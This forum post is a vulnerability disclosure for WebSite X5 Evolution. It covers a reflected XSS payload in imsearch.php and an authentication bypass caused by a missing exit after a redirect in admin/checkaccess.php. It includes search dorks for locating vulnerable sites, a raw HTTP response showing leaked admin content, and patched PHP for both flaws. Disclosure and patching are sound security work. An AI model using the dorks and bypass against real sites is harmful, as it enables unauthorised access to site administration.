Jump to content
Htich

XSS && Auth Bypass

By Htich, in Exploituri

Recommended Posts

Htich Newbie

Htich

Posted
Posted 
	

    =========================================
    Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)
    Vendor: www.websitex5.com
    Vulns: XSS && Auth Bypass
    Software License: Commercial
    Dork 1: inurl:imsearch.php
    Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php
    =========================================


    About Software:
    ==========================================
    WebSite X5 Evolution 9 is the most versatile and complete solution you'll find
    for creating eye-catching, functional and professional websites, blogs and
    online stores.

    You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is
    perhaps most amazing is the sheer power and totality of the features it offers.

    http://www.websitex5.com/en/evolution-9.html

    *Nice Software and easy to use.*
    ==========================================

    About Vulnerabilities:



    [*]                         XSS:             [*]
    site.tld/imsearch.php?search="\><script>alert(1);</script>



    Fix:

    Open imsearch.php and find:

    =============VULNERABLE CODE==============

    <?php
    $search = new imSearch();
    $search->search(@$_GET['search'], @$_GET['page']);
    ?>


    ==========END OF VULNERABLE CODE==========



                          REPLACE WITH:


    ==============FIXED CODE====================

    <?php
    $search = new imSearch();
    $search->search(@htmlspecialchars($_GET['search']), htmlspecialchars(@$_GET['page']));
    ?>

    ===========END OF FIXED CODE================




    [*] Second vulnerability is Authentication Bypass. [*]




    Vulnerable code:  site.tld/admin/checkaccess.php

    ========= BEGIN VULNERABLE CODE ===========


    <?php
            require_once("../res/x5engine.php");
            $login = new imPrivateArea();
            if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
                    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
                            header("Location: login.php?error");
                    else
                            header("Location: login.php");
            }
            else
                    $logged = TRUE;

    // End of file checkaccess.php

    ==========END OF VULNERABLE CODE==========


    Notice flaw: Script continues execution.



                                For reproduce:
    ===============================================

    Using Fiddler intercept the traffic from your browser and you will get output from scripts execution.
    Print screen:
    http://oi47.tinypic.com/f21sf7.jpg

    ==================== RAW=======================
    HTTP/1.1 302 Found
    Date: Sun, 25 Nov 2012 01:13:19 GMT
    Server: Apache
    Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 1188
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
    <head>
            <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
            <meta http-equiv="Content-Language" content="it" />
            <meta http-equiv="Content-Type-Script" content="text/javascript" />
            <meta http-equiv="ImageToolbar" content="False" />
            <meta name="MSSmartTagsPreventParsing" content="True" />
            <script type="text/javascript" src="../res/jquery.js"></script>
            <script type="text/javascript" src="../res/x5engine.js"></script>
            <link rel="stylesheet" type="text/css" href="template.css" media="screen" />
      <title>WebSite X5 Manager</title>
    </head>
    <body>
    <div id="imAdminPage">
            <div id="imBody">
                    <div class="imSectionTitle"></div>
                    <div class="imContent">
    <div class="imTest pass">?????? PHP: 5.2.17<span>PASS</span></div>
    <div class="imTest pass">????????? ??????<span>PASS</span></div>
    <div class="imTest pass">???? ? ????????? ????? ?? ???????<span>PASS</span></div>
                    </div>
            </div>
    </div>
    </body>


    ===============EOF RAW==================



    If your checkaccess.php isn't patched every file on /admin/*.php is vulnerable.





    Fixed Code:
    site.tld/admin/checkaccess.php

    ==============BEGIN =FIXED CODE=================
    <?php
            require_once("../res/x5engine.php");
            $login = new imPrivateArea();
            if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0)
            {
                    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
                    {
                            header("Location: login.php?error");
                            exit;
                            }

                    else
                    {
                            header("Location: login.php");
                            exit;
                            }
            }
            else
            {
                    $logged = TRUE;
                    }

    // End of file checkaccess.php

    ===============END OF FIXED CODE================


Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...